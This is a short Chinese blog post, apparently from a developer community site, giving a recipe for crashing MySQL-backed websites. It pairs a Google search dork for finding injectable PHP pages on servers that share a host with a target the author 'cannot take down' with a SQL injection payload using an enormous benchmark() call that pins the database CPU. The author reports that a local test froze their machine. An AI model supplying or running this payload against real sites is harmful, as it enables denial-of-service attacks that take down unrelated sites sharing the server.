一条sql语句使sql服务器崩溃

通过在谷歌搜索中使用特定的SQL注入查询,可以找到并利用网站的注入点,进而执行恶意代码,导致目标MySQL驱动站点遭受DoS攻击。
修改自:http://yaseng.me/mysql-sql-injection-ddos.html

当有一个拿不下的站时,可能可以用上它。谷歌同服站点Site:wooyun.org inurl:*.php?
找到注入点后执行sql语句select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
同服的mysql驱动站就死了。。。。
---------------------------------
PS:话说。。在本机的apache+mysql测试了一下,结果。。。系统卡死了,mysql的进程CPU占用率有90多。。。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值